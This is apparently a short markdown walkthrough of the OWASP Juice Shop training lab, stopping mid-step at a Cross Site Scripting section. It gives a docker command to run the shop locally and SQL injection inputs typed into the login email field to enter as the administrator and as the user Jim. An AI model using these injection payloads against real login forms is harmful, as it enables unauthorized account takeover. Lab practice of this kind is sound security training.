# Let's Buy Some Juice

## Booting Up Juice Shop

```sh
docker run --pull always -p 127.0.0.1:80:3000 bkimminich/juice-shop
```

## SQL Injection

### Login as Admin

1. Open `Account` => `Login`
2. Type `' OR TRUE; --` into `Email` and any password in `Password`

Result:

![](login_admin.png)

### Login as Jim

1. Open `Account` => `Login`
2. Type `jim@juice-sh.op'; --`

Result:

![](login_jim.png)

## Cross Site Scripting

1. Open up the Search Box
2. Type `